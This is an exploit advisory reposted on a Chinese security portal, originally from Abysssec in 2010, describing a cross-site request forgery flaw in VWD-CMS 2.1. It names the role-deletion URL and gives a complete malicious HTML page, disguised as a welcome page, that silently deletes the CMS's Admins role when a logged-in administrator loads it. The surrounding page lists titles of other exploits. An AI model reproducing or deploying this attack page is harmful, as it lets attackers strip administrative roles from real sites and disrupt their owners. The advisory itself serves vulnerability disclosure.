首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VWD-CMS CSRF Vulnerability
来源:http://www.abysssec.com 作者:Abysssec 发布时间:2010-09-21  

'''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/


 
 
  Title            :  VWD-CMS CSRF Vulnerability
  Affected Version :  VWD-CMS version 2.1
  Discovery        :  www.abysssec.com
  Vendor    :  http://www.vwd-cms.com/

  Demo      :  http://server/templates/Emerald.aspx
        http://server/templates/balloonr.aspx

  Download Links   :  http://vwdcms.codeplex.com/
 
  Admin Page       :  http://Example.com/login.aspx
 
http://www.exploit-db.com/moaub-20-vwd-cms-csrf-vulnerability/
'''
 
1)CSRF :
===========================================================================================     
  The VWD-CMS have CSRF Vulnerability in order to remove any Role especially Admins Role.
  With this Vulnerability you can navigate the admin to visit malicious site (when he is already logged in)
  to remove a role.

 In this path a role could be removed::
        http://Example.com/VwdCms/Members/RoleEdit.aspx?delete=yes&role=RoleName
        (RoleName can be Admins or Members)
 
  here is HTML File with AJAX Code and with GET Method for this operation that is enough to Admin meet it.


The Source of HTML Page (Malicious Site)
===========================================================================================    
 

<html>
<head>
<title >Wellcome to My Site!</title>
Hello!
...
...
...
This page remove Admins Role in VWD-CMS.

<script>         
        function RemoveRole() {           
            try {
                netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
            } catch (e) {}

            var http = false;
            if (window.XMLHttpRequest) {
                http = new XMLHttpRequest();
            }
            else if (window.ActiveXObject) {
                http = new ActiveXObject("Microsoft.XMLHTTP");               
            }

            url = "http://server/VwdCms/Members/RoleEdit.aspx?delete=yes&role=Admins";
            http.onreadystatechange = done;
            http.open('GET', url, true);
            http.send(null);
        }
        function done() {
            if (http.readyState == 4 && http.status == 200)
            {              
            }
        }    
</script>
</head>
<body onload ="RemoveRole();">
</body>
</html>

 

===========================================================================================
 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SWiSHmax DLL Hijacking Exploit
·Java CMM readMabCurveData Stac
·RarCrack 0.2 Buffer Overflow P
·Microsoft DRM Technology (msne
·Audiotran 1.4.2.4 SEH Overflow
·RarCrack v0.2 "filename" init(
·Novell iPrint Client Browser P
·BifrsoT DLL Hijacking Exploit
·万博网站管理系统(NWEB)通杀漏洞
·WM Downloader 3.0.1.1 stack bu
·win32/xp sp3 (Tr) user32.dll E
·Personal.Net Portal Multiple V
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved